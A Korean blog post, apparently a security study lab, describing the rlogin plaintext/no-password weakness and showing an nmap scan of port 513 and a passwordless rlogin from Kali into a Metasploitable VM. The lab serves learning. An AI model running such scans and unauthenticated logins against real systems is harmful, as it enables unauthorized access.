Self-Improvement
rlogin Service Detection 취약점 본문
*정의
상대 서버에서 rlogin 서비스가 활성화 중이며 rlogin 서비스는 암호화 없이 일반 텍스트로 데이터가 전송이 되어져 MITM 공격에 취약하며 암호 인증없이 연결이 가능하다.
Attacker : kali
Victim : metasploitable
*실습
(kali)
root@kali:~# nmap -sV -p 513 192.168.10.134
rlogin 서비스 확인
root@kali:~# rlogin 192.168.10.134
로그인 성공 (/etc/hosts.equiv, ~/.rhosts의 설정에 의해 암호입력 없이 가능)
(metasploitable)
'Kali Linux > Metasploitable' 카테고리의 다른 글
Debian OpenSSL Predictable PRNG Brute Force SSH (0) | 2018.10.21 |
---|---|
TCP Syn Flooding 실습 (0) | 2018.10.21 |
사전파일을 이용한 DB 원격 로그인 시도 (0) | 2018.10.21 |
Metasploit (= Meta Exploit Framework), Matasploitable 설치 (0) | 2018.10.21 |
DistCC Remote Code Execution Vulnerability 취약점 (0) | 2018.10.21 |